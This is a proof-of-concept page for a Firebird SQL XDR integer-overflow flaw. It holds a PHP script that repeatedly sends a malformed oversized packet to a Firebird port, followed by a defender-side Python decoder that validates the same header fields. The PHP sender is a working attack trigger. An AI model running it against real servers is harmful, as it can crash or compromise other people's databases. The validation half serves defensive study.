Firebird remote BOF POC

ITDEFENCE.ru

Firebird is a relational database offering many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix platforms.

<?php
/*
 *  (underwater@itdefence.ru)
 *
 *  Integer overflow in Firebird SQL 1.0.3 and earlier, 1.5.x before 1.5.6, 2.0.x before 2.0.4, and 2.1.x before 2.1.0
 *  RC1 might allow remote attackers to execute arbitrary code via crafted op_receive, op_start, op_start_and_receive,
 *  op_send, op_start_and_send, and op_start_send_and_receive XDR requests, which triggers memory corruption.
 *
 *  Vulnerable packages
 *
 *      Firebird SQL 1.0.3 and before.
 *      Firebird SQL 1.5.5 and before.
 *      Firebird SQL 2.0.3 and before.
 *      Firebird SQL 2.1.0 Beta 2 and before.
 *
 *  Non-vulnerable packages
 *
 *      Firebird SQL 1.5.6 (to be released)
 *      Firebird SQL 2.0.4 (to be released)
 *      Firebird SQL 2.1.0 RC1
 *
 *  src/remote/protocol.cpp:417
 *
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_incarnation));
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_transaction));
 *      MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_message_number));
 *      return xdr_request(xdrs, data->p_data_request,
 *           data->p_data_message_number,
 *           data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs, p);
 *
 *  Firebird Connect Packet
 *
 */

    // Oversized request: a 4-byte opcode word followed by 3000 filler bytes,
    // so every xdr_short field after the opcode decodes to 0x4a4a.
    $___suntzu = "\x00\x00\x00\x4a" . str_repeat("\x4a", 3000);

    // Send the same packet five times, one second apart, to the Firebird port.
    for ($temp = 0; $temp < 5; $temp++) {
        $___zuntzu = fsockopen('192.168.124.99', 3050);
        if (!$___zuntzu) {
            // Connection refused or timed out; try again on the next iteration.
            sleep(1);
            continue;
        }
        fwrite($___zuntzu, $___suntzu);
        fclose($___zuntzu);
        sleep(1);
    }

?>
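As an added defender-side example (not code from the PoC author or from Firebird itself), the following decodes the fixed header that the xdr_protocol branch quoted above reads, then applies the bounds checks a hardened decoder needs before the narrowed values are used as indexes. It assumes standard XDR encoding (each xdr_short carried on the wire as a 4-byte big-endian word) and a hypothetical per-connection object table of `n_objects` entries; the packet bytes come from the PoC on this page, and the well-formed packet is constructed.

```python
import struct

# Fixed header read by the xdr_protocol branch quoted above: a 4-byte opcode,
# then p_data_request, p_data_incarnation, p_data_transaction and
# p_data_message_number, each an xdr_short carried as a 4-byte big-endian word.
HEADER = struct.Struct(">IIIII")

# The packet the PoC on this page sends (opcode word followed by 3000 filler
# bytes), rebuilt here as sample input for the checks below.
POC_PACKET = b"\x00\x00\x00\x4a" + b"\x4a" * 3000
# A constructed well-formed header with small, in-range handles.
GOOD_PACKET = HEADER.pack(0x4a, 1, 0, 2, 0)


def xdr_short(word):
    """Narrow a 32-bit wire word to a signed 16-bit value, which is what
    storing the decoded SLONG into an SSHORT does on two's-complement hosts.
    This is where a large or crafted word silently becomes a wrong index."""
    v = word & 0xFFFF
    return v - 0x10000 if v & 0x8000 else v


def decode_data_request(packet):
    """Decode the five header words; refuse anything shorter than the header."""
    if len(packet) < HEADER.size:
        raise ValueError("truncated header: %d bytes" % len(packet))
    opcode, req, inc, tra, msg = HEADER.unpack_from(packet)
    return {
        "opcode": opcode,
        "p_data_request": xdr_short(req),
        "p_data_incarnation": xdr_short(inc),
        "p_data_transaction": xdr_short(tra),
        "p_data_message_number": xdr_short(msg),
    }


def validate(fields, n_objects):
    """Checks a hardened decoder applies before handles are used as indexes.
    Assumption for this example: p_data_request and p_data_transaction index a
    per-connection object table of n_objects entries; the other two fields
    must be non-negative. Returns the violated checks (empty means accept)."""
    problems = []
    for name in ("p_data_request", "p_data_transaction"):
        v = fields[name]
        if not 0 <= v < n_objects:
            problems.append("%s=%d outside [0, %d)" % (name, v, n_objects))
    for name in ("p_data_incarnation", "p_data_message_number"):
        if fields[name] < 0:
            problems.append("%s=%d is negative" % (name, fields[name]))
    return problems


if __name__ == "__main__":
    print(validate(decode_data_request(POC_PACKET), 16))
```

Run against the PoC packet, both handle fields decode to 19018 and are rejected; a word such as 0x00018000 narrows to -32768, which the negative-value check catches.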
